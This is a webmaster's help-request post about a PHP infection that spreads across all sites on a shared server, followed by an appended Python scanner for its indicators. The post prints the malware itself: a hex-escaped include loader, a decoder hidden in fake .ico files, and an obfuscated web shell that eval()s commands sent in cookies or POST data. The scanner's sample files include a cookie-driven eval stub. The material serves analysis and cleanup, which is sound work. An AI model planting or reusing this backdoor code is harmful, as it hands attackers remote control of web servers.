Help! A virus has infected every website at our company and I cannot get rid of it completely! Please help.
Virus characteristics
1. Once it gets into one website on the server, it modifies every other website on the server as well, and even changes directory permissions.
2. It automatically generates index.php files containing the code below, and at the same time creates favicon_*.ico files in all sorts of directories.
After decoding, the .ico turns out to be code disguised as an icon file.
```php
<?php
/*f969b*/
// The \x escapes decode to the path "lt/search/favicon_7fe236.ico", i.e. the PHP payload disguised as an icon.
@include "\x6ct\x2fs\x65a\x72c\x68/\x66a\x76i\x63o\x6e_\x37f\x652\x336\x2ei\x63o";
/*f969b*/
```
The .ico file contains:
```php
<?php
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
{
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);
$lysoa = 3298;
// Decoder: maps each character of $xcqtszj through the substitution table
// $qbqxxjvsbm, then rawurldecode()s the result (the function name is split to hide it).
function yhdjugyza($xcqtszj, $qbqxxjvsbm)
{
    $egiafr = '';
    for ($i = 0; $i < strlen($xcqtszj); $i++) {
        $egiafr .= isset($qbqxxjvsbm[$xcqtszj[$i]]) ? $qbqxxjvsbm[$xcqtszj[$i]] : $xcqtszj[$i];
    }
    $omlgrnwny = "rawurl" . "decode";
    return $omlgrnwny($egiafr);
}
```
3. It renames index.html to index.html.bak.bak, creates an index.php alongside it, and has the index.php point at index.html.bak.bak through code.
4. In some directories it creates virus files with names like the following:
article19.php
dirs25.php
files94.php
page30.php
Part of the code:
```php
<?php
// Every function name below is assembled from character positions in $jfwek,
// so the file contains no literal "eval", "pack" or "$_COOKIE" to grep for.
$jfwek = 'yvxr_o0943mfneiuHkd\'5-#s17b8t2c*lapg';
$mdcrdy = Array();
$mdcrdy[] = $jfwek[16].$jfwek[31];   // "H*" (pack() format: hex string to bytes)
$mdcrdy[] = $jfwek[22];              // "#"  (field separator)
$mdcrdy[] = $jfwek[24].$jfwek[27].$jfwek[25].$jfwek[7].$jfwek[6].$jfwek[29].$jfwek[11].$jfwek[20].$jfwek[21].$jfwek[9].$jfwek[7].$jfwek[18].$jfwek[29].$jfwek[21].$jfwek[8].$jfwek[33].$jfwek[7].$jfwek[30].$jfwek[21].$jfwek[7].$jfwek[13].$jfwek[33].$jfwek[30].$jfwek[21].$jfwek[8].$jfwek[18].$jfwek[24].$jfwek[30].$jfwek[9].$jfwek[13].$jfwek[25].$jfwek[11].$jfwek[26].$jfwek[20].$jfwek[24].$jfwek[33];   // GUID-style XOR key
$mdcrdy[] = $jfwek[30].$jfwek[5].$jfwek[15].$jfwek[12].$jfwek[28];   // "count"
$mdcrdy[] = $jfwek[23].$jfwek[28].$jfwek[3].$jfwek[4].$jfwek[3].$jfwek[13].$jfwek[34].$jfwek[13].$jfwek[33].$jfwek[28];   // "str_repeat"
$mdcrdy[] = $jfwek[13].$jfwek[2].$jfwek[34].$jfwek[32].$jfwek[5].$jfwek[18].$jfwek[13];   // "explode"
$mdcrdy[] = $jfwek[23].$jfwek[15].$jfwek[26].$jfwek[23].$jfwek[28].$jfwek[3];   // "substr"
$mdcrdy[] = $jfwek[33].$jfwek[3].$jfwek[3].$jfwek[33].$jfwek[0].$jfwek[4].$jfwek[10].$jfwek[13].$jfwek[3].$jfwek[35].$jfwek[13];   // "array_merge"
$mdcrdy[] = $jfwek[23].$jfwek[28].$jfwek[3].$jfwek[32].$jfwek[13].$jfwek[12];   // "strlen"
$mdcrdy[] = $jfwek[34].$jfwek[33].$jfwek[30].$jfwek[17];   // "pack"

// Every cookie and every POST field is tried as a command channel.
foreach ($mdcrdy[7]($_COOKIE, $_POST) as $eyynwg => $qynibe) {
    // Key stream: the parameter name plus the GUID, repeated to the payload length.
    function bqjwgy($mdcrdy, $eyynwg, $cavxuf) {
        return $mdcrdy[6]($mdcrdy[4]($eyynwg . $mdcrdy[2], ($cavxuf / $mdcrdy[8]($eyynwg)) + 1), 0, $cavxuf);
    }
    // Hex-decodes the parameter value.
    function cicqtnb($mdcrdy, $ubxwmgg) {
        return @$mdcrdy[9]($mdcrdy[0], $ubxwmgg);
    }
    // Splits the decoded value on "#"; when the field count is a multiple of 3,
    // passes field 2 through the function named in field 1 and eval()s the result.
    function tlxhk($mdcrdy, $ubxwmgg) {
        $bfvwkb = $mdcrdy[3]($ubxwmgg) % 3;
        if (!$bfvwkb) {
            eval($ubxwmgg[1]($ubxwmgg[2]));
            exit();
        }
    }
    $qynibe = cicqtnb($mdcrdy, $qynibe);
    tlxhk($mdcrdy, $mdcrdy[5]($mdcrdy[1], $qynibe ^ bqjwgy($mdcrdy, $eyynwg, $mdcrdy[8]($qynibe))));
}
```
These are the characteristics I have found so far; there may be others I have not noticed.
Has any other webmaster on the forum run into something like this? Cleaning it by hand is beyond what one person can do: if even one file is missed, a whole batch of virus files is back the next day. This is beyond my technical ability, so I am hoping some kind soul can help, even if it is just a pointer.
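A scanner for the indicators listed in this post, written here as an added example rather than a tool from the thread: it walks a web root and flags the hex-escaped @include, PHP code inside .ico files, the ALREADY_RUN_* guard, the index.html.bak.bak rename, and eval() driven by $_COOKIE/$_POST. The sample tree it builds is constructed from the post's file names and stubs, not real infected files.

```python
import os, re, tempfile

# Indicators from the post: hex-escaped @include, PHP inside .ico files, the
# ALREADY_RUN_* guard, index.html.bak.bak, eval() fed from $_COOKIE/$_POST.
HEX_INCLUDE = re.compile(rb'@include\s+"([^"\\]*(?:\\x[0-9a-fA-F]{2}[^"\\]*)+)"')
ALREADY_RUN = re.compile(rb"ALREADY_RUN_[0-9a-f]+")
SUPERGLOBAL_EVAL = re.compile(rb"\$_(?:COOKIE|POST)\b.*\beval\s*\(", re.S)

def decode_php_hex(s: bytes) -> str:
    # Resolve \xNN escapes of a PHP double-quoted string into plain text.
    return re.sub(rb"\\x([0-9a-fA-F]{2})", lambda m: bytes([int(m.group(1), 16)]), s).decode("latin-1")

def scan_webroot(root: str) -> list:
    # Walk a web root and return sorted (relative path, reason) pairs.
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name == "index.html.bak.bak":
                findings.append((rel, "original index.html renamed by the loader"))
                continue
            with open(path, "rb") as fh:
                head = fh.read(65536)  # the loader stubs sit at the top of the file
            if name.endswith(".ico") and head.lstrip().startswith(b"<?php"):
                findings.append((rel, "PHP code disguised as .ico"))
            m = HEX_INCLUDE.search(head)
            if m:
                findings.append((rel, "hex-escaped @include of " + decode_php_hex(m.group(1))))
            if ALREADY_RUN.search(head):
                findings.append((rel, "ALREADY_RUN_* loader guard"))
            if SUPERGLOBAL_EVAL.search(head):
                findings.append((rel, "eval() fed from $_COOKIE/$_POST (web shell)"))
    return sorted(findings)

def build_sample_webroot() -> str:
    # Constructed sample tree mirroring the post's layout (not real infected files).
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "lt", "search"))
    files = {
        "index.php": b'<?php\n/*f969b*/\n@include "\\x6ct\\x2fs\\x65a\\x72c\\x68/\\x66a\\x76i\\x63o\\x6e_\\x37f\\x652\\x336\\x2ei\\x63o";\n',
        "lt/search/favicon_7fe236.ico": b"<?php\nif (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718')) {}\n",
        "index.html.bak.bak": b"<html></html>",
        "files94.php": b"<?php foreach (array_merge($_COOKIE, $_POST) as $k => $v) { eval($v); }",
        "clean.php": b"<?php echo 'ok';",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body)
    return root
```

Run scan_webroot() against the real document root of every site on the server, not just the one where the infection was first seen, since the post notes the loader spreads to all sites on the host.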